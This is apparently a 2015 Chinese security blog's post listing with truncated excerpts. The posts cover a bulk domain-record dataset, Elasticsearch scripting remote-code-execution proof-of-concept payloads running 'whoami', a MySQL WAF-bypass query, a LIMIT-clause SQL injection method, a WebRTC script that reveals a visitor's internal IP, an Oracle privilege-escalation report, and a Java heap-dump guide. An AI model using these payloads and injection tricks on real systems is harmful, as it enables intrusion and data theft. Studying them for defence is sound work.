2015-03-16 17:55:42

[分享]1.9亿域名A记录(主域名:1.18亿,子域名7300万)

最近社区里很多人在搞大数据分析,之前也有整理过一些数据但是量不大。这次给大家分享来自dnscensus 2013的大量域名解析数据。首先@insight-labs 感谢A牛! 总域名数量:191846073 主域:118212410 子域名:73633663 来源:dnscensus 2013 整理:[email protected] 主域名: 子域名: 其他相关数据收集: alexa和quantcast排名前100W网站 子域名Top 3000 下载地址:domain.zip

2015-03-05 10:02:24

elasticsearch scripting security issues

elasticsearch scripting: http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/modules-scripting.html security issues: http://www.elasticsearch.org/community/security/ http://mp.weixin.qq.com/s?__biz=MjM5OTk2MTMxOQ==&mid=202983721&idx=1&sn=bde079dcee38c4c655e920cbcc78c6e8&scene=0 POC: Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"whoami\").getText() super.class.toString().valueOf('whoami').execute().getText() http://zone.wooyun.org/content/18915 {"size":1,"script_fields": {"iswin": {&quo

2015-02-12 10:48:43

2015-02-10 21:20:12

[zone]mysql 语法绕过一些WAF

转:mysql syntax bypass some WAF 一个小tips,twitter上看见的: 一句话: select{x table_name}from{x information_schema.tables} 测试: mysql> select{x table_name}from{x information_schema.tables}; +----------------------------------------------------+ | table_name | +----------------------------------------------------+ | CHARACTER_SETS | | COLLATIONS | | COLLATION_CHARACTER_SET_APPLICABILITY | | COLUMNS | | COLUMN_PRIVILEGES

2015-01-30 15:47:18

jsoup 1.8 修改版

简单修改了几个小地方: 1、增加了自定义URL参数Encoding(connection.setURLEncoding(boolean isURLEncoding);)。 2、增加动态识别网页源码方法,原来的获取页面编码会不太准确,现在如果设置了自动parseEncoding的可以降低乱码出现率(connection.setParseEncoding(boolean parseEncoding);)。 3、增加了一个基础工具类用来发简单的HTTP请求(org.jsoup.helper.HttpRequestUtils)。 4、新增了忽略SSL证书方法(org.jsoup.helper.SslUtils) 编译环境jdk1.5 jsoup-1.8.1-yz.jar

2015-01-27 11:32:49

[zone] JavaScript 获取客户端内网IP和外网IP(STUN)

FROM:http://zone.wooyun.org/content/18274 from:https://github.com/diafygi/webrtc-ips Firefox 跟 Chrome支持WebRTC可以向STUN服务器请求,返回内外网IP,不同于XMLHttpRequest请求,STUN请求开发者工具当中看不到网络请求的。 测试链接 //get the IP addresses associated with an account function getIPs(callback){ var ip_dups = {}; //compatibility for firefox and chrome var RTCPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection; var mediaConstraints = { optional: [{RtpDataChannels: true}] }; //firefox already has a default stun server in about:config

2014-12-26 11:23:42

2015-01-24 22:41:33

[zone]MySQL 在 LIMIT 条件后注入

FROM:http://zone.wooyun.org/content/18220 from:https://rateip.com/blog/sql-injections-in-mysql-limit-clause/ 此方法适用于MySQL 5.x中,在limit语句后面的注入 例如: SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT injection_point 上面的语句包含了ORDER BY,MySQL当中UNION语句不能在ORDER BY的后面,否则利用UNION很容易就可以读取数据了,看看在MySQL 5中的SELECT语法: SELECT [ALL | DISTINCT | DISTINCTROW ] [HIGH_PRIORITY] [STRAIGHT_JOIN] [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT] [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS] select_expr [, select_expr ...] [FROM table_references [WHERE where_c

2015-01-23 20:06:33

Oracle public权限用户通过Oracle索引提权

今天下午2点左右看到这个漏洞就立马测试了一下发现没成功(我测试的版本是12.1.0.1.0 和oracle 10g),google了一下找到了INDEX to SYSDBA without SELECT。 文章发布时间是2014年3月,当时觉得可能是一个老漏洞了(我那时还不知道这个漏洞的CVE)。到了下午看到相关的漏洞新闻报道才知道Oracle 漏洞猎手David Litchfield在去年6又发现了一个新提权漏洞(CVE-2015-0393)。 引用一篇关于这个漏洞的报道: 疑似后门:漏洞CVE-2015-0393 江湖人称“Oracle漏洞猎手”的David Litchfield在去年6月11日发现过Oracle一个疑似后门的严重漏洞CVE-2015-0393。 日前Litchfield向我们透漏了一些漏洞细节: 在该漏洞中,Oracle数据库内的PUBLIC角色在DUAL表中被授予了索引权限,也就是说任何用户都可以在该表创建索引。 DUAL表是SYS用户下的一张内部表,所有用户都可以使用DUAL名称访问,无论什么时候这个表总是存在。在DUAL表中创建了基于函数的索引后,黑客将暂时获得SYS用户权限(SYSDBA),可执行任意SQL语句进而尝试控制整个服务器。如果存在这个漏洞的电子商务套件可以从外网远程访问的话,攻击者只要有PUBLIC角色(不需要用户密码),就可以跟进

2015-01-19 22:57:14

java应用内存dump和分析工具

首先:# ps -ef |grep java 找到程序的PID,然后用jmap dump分析。 # jmap -dump:format=b,file=test.bin 23160 压缩后下载到本地。 # zip -r test.bin.zip test.bin 本机解压后使用jat查看: [[email protected]:Downloads]$ jhat test.bin Reading from test.bin... Dump file created Mon Jan 19 18:06:51 CST 2015 Snapshot read, resolving... Resolving 1602637 objects... Chasing references, expect 320 dots..................................................................................................................................................................................................................................................................